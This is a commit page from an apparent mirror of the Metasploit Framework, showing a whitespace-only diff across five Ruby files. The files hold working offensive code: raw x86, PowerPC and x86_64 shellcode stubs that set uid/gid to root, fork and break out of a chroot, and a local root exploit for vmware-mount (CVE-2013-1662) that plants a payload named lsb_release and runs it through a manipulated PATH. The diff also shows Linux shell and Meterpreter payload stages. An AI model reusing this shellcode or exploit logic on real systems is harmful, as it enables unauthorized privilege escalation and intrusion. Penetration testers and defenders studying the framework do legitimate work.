infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Retab changes for PR #2325

bug/bundler_fix
Tab Assassin 2013-09-05 13:24:09 -05:00
parent 5ff25d8b96
commit 896bb129cd
5 changed files with 480 additions and 480 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

730
lib/msf/core/payload/linux.rb
View File

@ -10,421 +10,421 @@ require 'msf/core'
###
module Msf::Payload::Linux
#
# This mixin is chained within payloads that target the Linux platform.
# It provides special prepends, to support things like chroot and setuid.
#
def initialize(info = {})
ret = super(info)
#
# This mixin is chained within payloads that target the Linux platform.
# It provides special prepends, to support things like chroot and setuid.
#
def initialize(info = {})
ret = super(info)
register_advanced_options(
[
Msf::OptBool.new('PrependFork',
[
false,
"Prepend a stub that executes: if (fork()) { exit(0); }",
"false"
]
),
Msf::OptBool.new('PrependSetresuid',
[
false,
"Prepend a stub that executes the setresuid(0, 0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetreuid',
[
false,
"Prepend a stub that executes the setreuid(0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetuid',
[
false,
"Prepend a stub that executes the setuid(0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetresgid',
[
false,
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetregid',
[
false,
"Prepend a stub that executes the setregid(0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetgid',
[
false,
"Prepend a stub that executes the setgid(0) system call",
"false"
]
),
Msf::OptBool.new('PrependChrootBreak',
[
false,
"Prepend a stub that will break out of a chroot (includes setreuid to root)",
"false"
]
),
Msf::OptBool.new('AppendExit',
[
false,
"Append a stub that executes the exit(0) system call",
"false"
]
),
], Msf::Payload::Linux)
register_advanced_options(
[
Msf::OptBool.new('PrependFork',
[
false,
"Prepend a stub that executes: if (fork()) { exit(0); }",
"false"
]
),
Msf::OptBool.new('PrependSetresuid',
[
false,
"Prepend a stub that executes the setresuid(0, 0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetreuid',
[
false,
"Prepend a stub that executes the setreuid(0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetuid',
[
false,
"Prepend a stub that executes the setuid(0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetresgid',
[
false,
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetregid',
[
false,
"Prepend a stub that executes the setregid(0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetgid',
[
false,
"Prepend a stub that executes the setgid(0) system call",
"false"
]
),
Msf::OptBool.new('PrependChrootBreak',
[
false,
"Prepend a stub that will break out of a chroot (includes setreuid to root)",
"false"
]
),
Msf::OptBool.new('AppendExit',
[
false,
"Append a stub that executes the exit(0) system call",
"false"
]
),
], Msf::Payload::Linux)
ret
end
ret
end
#
# Overload the generate() call to prefix our stubs
#
def generate(*args)
# Call the real generator to get the payload
buf = super(*args)
pre = ''
app = ''
#
# Overload the generate() call to prefix our stubs
#
def generate(*args)
# Call the real generator to get the payload
buf = super(*args)
pre = ''
app = ''
test_arch = [ *(self.arch) ]
test_arch = [ *(self.arch) ]
# Handle all x86 code here
if (test_arch.include?(ARCH_X86))
# Handle all x86 code here
if (test_arch.include?(ARCH_X86))
# Prepend
# Prepend
if (datastore['PrependFork'])
pre << "\x6a\x02" +# pushb $0x2 #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 ; fork #
"\x85\xc0" +# test %eax,%eax #
"\x74\x06" +# jz 0xf #
"\x31\xc0" +# xor %eax,%eax #
"\xb0\x01" +# movb $0x1,%al ; exit #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependFork'])
pre << "\x6a\x02" +# pushb $0x2 #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 ; fork #
"\x85\xc0" +# test %eax,%eax #
"\x74\x06" +# jz 0xf #
"\x31\xc0" +# xor %eax,%eax #
"\xb0\x01" +# movb $0x1,%al ; exit #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\xf7\xe3" +# mull %ebx #
"\xb0\xa4" +# movb $0xa4,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\xf7\xe3" +# mull %ebx #
"\xb0\xa4" +# movb $0xa4,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x46" +# pushl $0x46 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x46" +# pushl $0x46 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x17" +# pushl $0x17 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x17" +# pushl $0x17 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\xf7\xe3" +# mull %ebx #
"\xb0\xaa" +# movb $0xaa,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\xf7\xe3" +# mull %ebx #
"\xb0\xaa" +# movb $0xaa,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x47" +# pushl $0x47 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x47" +# pushl $0x47 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x2e" +# pushl $0x2e #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x46" +# pushl $0x46 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x2e" +# pushl $0x2e #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x46" +# pushl $0x46 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
# break chroot
pre << "\x6a\x3d" +# pushl $0x3d #
# build dir str (ptr in ebx)
"\x89\xe3" +# movl %esp,%ebx #
# mkdir(dir)
"\x6a\x27" +# pushl $0x27 #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
# chroot(dir)
"\x89\xd9" +# movl %ebx,%ecx #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
# build ".." str (ptr in ebx)
"\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
# break chroot
pre << "\x6a\x3d" +# pushl $0x3d #
# build dir str (ptr in ebx)
"\x89\xe3" +# movl %esp,%ebx #
# mkdir(dir)
"\x6a\x27" +# pushl $0x27 #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
# chroot(dir)
"\x89\xd9" +# movl %ebx,%ecx #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
# build ".." str (ptr in ebx)
"\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x66\x68\x2e\x2e" +# pushw $0x2e2e #
"\x89\xe3" +# movl %esp,%ebx #
# loop changing dir
"\x6a\x3d" +# pushl $0x1e #
"\x59" +# popl %ecx #
"\xb0\x0c" +# movb $0xc,%al #
"\xcd\x80" +# int $0x80 #
"\xe2\xfa" +# loop -6 #
# final chroot
"\x6a\x3d" +# pushl $0x3d #
"\x89\xd9" +# movl %ebx,%ecx #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
"\x66\x68\x2e\x2e" +# pushw $0x2e2e #
"\x89\xe3" +# movl %esp,%ebx #
# loop changing dir
"\x6a\x3d" +# pushl $0x1e #
"\x59" +# popl %ecx #
"\xb0\x0c" +# movb $0xc,%al #
"\xcd\x80" +# int $0x80 #
"\xe2\xfa" +# loop -6 #
# final chroot
"\x6a\x3d" +# pushl $0x3d #
"\x89\xd9" +# movl %ebx,%ecx #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
end
end
# Append exit(0)
# Append exit(0)
if (datastore['AppendExit'])
app << "\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x01" +# pushl $0x01 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['AppendExit'])
app << "\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x01" +# pushl $0x01 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
end
# Handle all Power/CBEA code here
elsif (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]))
# Handle all Power/CBEA code here
elsif (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ]))
# Prepend
# Prepend
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\xa5" +# addi r0,r31,-347 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\xa5" +# addi r0,r31,-347 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x18" +# addi r0,r31,-488 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x18" +# addi r0,r31,-488 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\xab" +# addi r0,r31,-341 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\xab" +# addi r0,r31,-341 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x48" +# addi r0,r31,-440 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x48" +# addi r0,r31,-440 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x2f" +# addi r0,r31,-465 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x2f" +# addi r0,r31,-465 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
"\x44\xff\xff\x02" # sc #
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
"\x44\xff\xff\x02" # sc #
# EEK! unsupported...
end
# EEK! unsupported...
end
# Append exit(0)
# Append exit(0)
if (datastore['AppendExit'])
app << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['AppendExit'])
app << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
"\x44\xff\xff\x02" # sc #
end
elsif (test_arch.include?(ARCH_X86_64))
elsif (test_arch.include?(ARCH_X86_64))
if (datastore['PrependFork'])
# if (fork()) { exit(0); }
pre << "\x6a\x39" # push 57 ; __NR_fork #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
pre << "\x48\x85\xc0" # test rax,rax #
pre << "\x74\x08" # jz 0x08 #
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x6a\x3c" # push 60 ; __NR_exit #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependFork'])
# if (fork()) { exit(0); }
pre << "\x6a\x39" # push 57 ; __NR_fork #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
pre << "\x48\x85\xc0" # test rax,rax #
pre << "\x74\x08" # jz 0x08 #
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x6a\x3c" # push 60 ; __NR_exit #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x48\x89\xfe" # mov rsi,rdi #
pre << "\x6a\x75" # push 0x75 #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x48\x89\xfe" # mov rsi,rdi #
pre << "\x6a\x75" # push 0x75 #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x48\x89\xfe" # mov rsi,rdi #
pre << "\x48\x89\xf2" # mov rdx,rsi #
pre << "\x6a\x71" # push 0x71 #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x48\x89\xfe" # mov rsi,rdi #
pre << "\x48\x89\xf2" # mov rdx,rsi #
pre << "\x6a\x71" # push 0x71 #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x6a\x69" # push 0x69 #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x6a\x69" # push 0x69 #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x48\x89\xfe" # mov rsi,rdi #
pre << "\x6a\x77" # push 0x77 #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x48\x89\xfe" # mov rsi,rdi #
pre << "\x6a\x77" # push 0x77 #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x48\x89\xfe" # mov rsi,rdi #
pre << "\x48\x89\xf2" # mov rdx,rsi #
pre << "\x6a\x72" # push 0x72 #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x48\x89\xfe" # mov rsi,rdi #
pre << "\x48\x89\xf2" # mov rdx,rsi #
pre << "\x6a\x72" # push 0x72 #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x6a\x6a" # push 0x6a #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x6a\x6a" # push 0x6a #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end
if (datastore['PrependChrootBreak'])
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x48\x89\xfe" # mov rsi,rdi #
pre << "\x48\x89\xf8" # mov rax,rdi #
pre << "\xb0\x71" # mov al,0x71 #
pre << "\x0f\x05" # syscall #
# setreuid(0, 0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x48\x89\xfe" # mov rsi,rdi #
pre << "\x48\x89\xf8" # mov rax,rdi #
pre << "\xb0\x71" # mov al,0x71 #
pre << "\x0f\x05" # syscall #
# generate temp dir name
pre << "\x48\xbf" # mov rdi, #
pre << Rex::Text.rand_text_alpha(8) # random #
pre << "\x56" # push rsi #
pre << "\x57" # push rdi #
# generate temp dir name
pre << "\x48\xbf" # mov rdi, #
pre << Rex::Text.rand_text_alpha(8) # random #
pre << "\x56" # push rsi #
pre << "\x57" # push rdi #
# mkdir(random,0755)
pre << "\x48\x89\xe7" # mov rdi,rsp #
pre << "\x66\xbe\xed\x01" # mov si,0755 #
pre << "\x6a\x53" # push 0x53 #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
# mkdir(random,0755)
pre << "\x48\x89\xe7" # mov rdi,rsp #
pre << "\x66\xbe\xed\x01" # mov si,0755 #
pre << "\x6a\x53" # push 0x53 #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
# chroot(random)
pre << "\x48\x31\xd2" # xor rdx,rdx #
pre << "\xb2\xa1" # mov dl,0xa1 #
pre << "\x48\x89\xd0" # mov rax,rdx #
pre << "\x0f\x05" # syscall #
# chroot(random)
pre << "\x48\x31\xd2" # xor rdx,rdx #
pre << "\xb2\xa1" # mov dl,0xa1 #
pre << "\x48\x89\xd0" # mov rax,rdx #
pre << "\x0f\x05" # syscall #
# build .. (ptr in rdi )
pre << "\x66\xbe\x2e\x2e" # mov si,0x2e2e #
pre << "\x56" # push rsi #
pre << "\x48\x89\xe7" # mov rdi,rsp #
# build .. (ptr in rdi )
pre << "\x66\xbe\x2e\x2e" # mov si,0x2e2e #
pre << "\x56" # push rsi #
pre << "\x48\x89\xe7" # mov rdi,rsp #
# loop chdir(..) 69 times
# syscall tend to modify rcx can't use loop...
pre << "\x6a\x45" # push 0x45 #
pre << "\x5b" # pop rbx #
pre << "\x6a\x50" # push 0x50 #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
pre << "\xfe\xcb" # dec bl #
pre << "\x75\xf7" # jnz -7 #
# loop chdir(..) 69 times
# syscall tend to modify rcx can't use loop...
pre << "\x6a\x45" # push 0x45 #
pre << "\x5b" # pop rbx #
pre << "\x6a\x50" # push 0x50 #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
pre << "\xfe\xcb" # dec bl #
pre << "\x75\xf7" # jnz -7 #
# chroot (.) (which should be /)
pre << "\x6a\x2e" # push . (0x2e) #
pre << "\x48\x89\xe7" # mov rdi,rsp #
pre << "\x48\x89\xd0" # mov rax,rdx #
pre << "\x0f\x05" # syscall #
# chroot (.) (which should be /)
pre << "\x6a\x2e" # push . (0x2e) #
pre << "\x48\x89\xe7" # mov rdi,rsp #
pre << "\x48\x89\xd0" # mov rax,rdx #
pre << "\x0f\x05" # syscall #
end
end
# Append exit(0)
if (datastore['AppendExit'])
app << "\x48\x31\xff" # xor rdi,rdi #
app << "\x6a\x3c" # push 0x3c #
app << "\x58" # pop rax #
app << "\x0f\x05" # syscall #
end
end
# Append exit(0)
if (datastore['AppendExit'])
app << "\x48\x31\xff" # xor rdi,rdi #
app << "\x6a\x3c" # push 0x3c #
app << "\x58" # pop rax #
app << "\x0f\x05" # syscall #
end
end
return (pre + buf + app)
end
return (pre + buf + app)
end
end

86
modules/exploits/linux/local/vmware_mount.rb
View File

@ -16,48 +16,48 @@ class Metasploit4 < Msf::Exploit::Local
include Msf::Post::Common
include Msf::Post::File
def initialize(info={})
super( update_info( info, {
'Name' => 'VMWare Setuid vmware-mount Unsafe popen(3)',
'Description' => %q{
VMWare Workstation (up to and including 9.0.2 build-1031769)
and Player have a setuid executable called vmware-mount that
invokes lsb_release in the PATH with popen(3). Since PATH is
user-controlled, and the default system shell on
Debian-derived distributions does not drop privs, we can put
an arbitrary payload in an executable called lsb_release and
have vmware-mount happily execute it as root for us.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Tavis Ormandy', # Vulnerability discovery and PoC
'egypt' # Metasploit module
],
'Platform' => [ 'linux' ],
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultOptions' => {
"PrependSetresuid" => true,
"PrependSetresgid" => true,
"PrependFork" => true,
},
'Privileged' => true,
'DefaultTarget' => 0,
'References' => [
[ 'CVE', '2013-1662' ],
[ 'OSVDB', '96588' ],
[ 'BID', '61966'],
[ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
[ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ]
],
'DisclosureDate' => "Aug 22 2013"
}
))
end
def initialize(info={})
super( update_info( info, {
'Name' => 'VMWare Setuid vmware-mount Unsafe popen(3)',
'Description' => %q{
VMWare Workstation (up to and including 9.0.2 build-1031769)
and Player have a setuid executable called vmware-mount that
invokes lsb_release in the PATH with popen(3). Since PATH is
user-controlled, and the default system shell on
Debian-derived distributions does not drop privs, we can put
an arbitrary payload in an executable called lsb_release and
have vmware-mount happily execute it as root for us.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Tavis Ormandy', # Vulnerability discovery and PoC
'egypt' # Metasploit module
],
'Platform' => [ 'linux' ],
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultOptions' => {
"PrependSetresuid" => true,
"PrependSetresgid" => true,
"PrependFork" => true,
},
'Privileged' => true,
'DefaultTarget' => 0,
'References' => [
[ 'CVE', '2013-1662' ],
[ 'OSVDB', '96588' ],
[ 'BID', '61966'],
[ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
[ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ]
],
'DisclosureDate' => "Aug 22 2013"
}
))
end
def check
if setuid?("/usr/bin/vmware-mount")
@ -72,7 +72,7 @@ class Metasploit4 < Msf::Exploit::Local
fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
end
write_file("lsb_release", generate_payload_exe)
write_file("lsb_release", generate_payload_exe)
cmd_exec("chmod +x lsb_release")
cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")

4
modules/payloads/stages/linux/x64/shell.rb
View File

@ -11,8 +11,8 @@ require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,

136
modules/payloads/stages/linux/x86/meterpreter.rb
View File

@ -11,96 +11,96 @@ require 'msf/base/sessions/meterpreter_options'
require 'rex/elfparsey'
module Metasploit3
include Msf::Sessions::MeterpreterOptions
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
super(update_info(info,
'Name' => 'Linux Meterpreter',
'Description' => 'Staged meterpreter server',
'Author' => ['PKS', 'egypt'],
'Platform' => 'linux',
'Arch' => ARCH_X86,
'License' => MSF_LICENSE,
'Session' => Msf::Sessions::Meterpreter_x86_Linux))
def initialize(info = {})
super(update_info(info,
'Name' => 'Linux Meterpreter',
'Description' => 'Staged meterpreter server',
'Author' => ['PKS', 'egypt'],
'Platform' => 'linux',
'Arch' => ARCH_X86,
'License' => MSF_LICENSE,
'Session' => Msf::Sessions::Meterpreter_x86_Linux))
register_options([
OptInt.new('DebugOptions', [ false, "Debugging options for POSIX meterpreter", 0 ])
], self.class)
end
register_options([
OptInt.new('DebugOptions', [ false, "Debugging options for POSIX meterpreter", 0 ])
], self.class)
end
def elf_ep(payload)
elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
ep = elf.elf_header.e_entry
return ep
end
def elf_ep(payload)
elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
ep = elf.elf_header.e_entry
return ep
end
def elf2bin(payload)
# XXX, not working. Use .c version
def elf2bin(payload)
# XXX, not working. Use .c version
# This code acts as a mini elf parser / memory layout linker.
# It will return what a elf file looks like once loaded in memory
# This code acts as a mini elf parser / memory layout linker.
# It will return what a elf file looks like once loaded in memory
mem = "\x00" * (4 * 1024 * 1024)
used = 0
mem = "\x00" * (4 * 1024 * 1024)
used = 0
elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
elf.program_header.each { |hdr|
if(hdr.p_type == Rex::ElfParsey::ElfBase::PT_LOAD)
print_status("Found PT_LOAD")
fileidx = hdr.p_offset & (~4095)
memidx = (hdr.p_vaddr & (~4095)) - elf.base_addr
len = hdr.p_filesz + (hdr.p_vaddr & 4095)
elf.program_header.each { |hdr|
if(hdr.p_type == Rex::ElfParsey::ElfBase::PT_LOAD)
print_status("Found PT_LOAD")
fileidx = hdr.p_offset & (~4095)
memidx = (hdr.p_vaddr & (~4095)) - elf.base_addr
len = hdr.p_filesz + (hdr.p_vaddr & 4095)
mem[memidx,memidx+len] = payload[fileidx,fileidx+len] # should result in a single memcpy call :D
used += (hdr.p_memsz + (hdr.p_vaddr & 4095) + 4095) & ~4095
end
}
mem[memidx,memidx+len] = payload[fileidx,fileidx+len] # should result in a single memcpy call :D
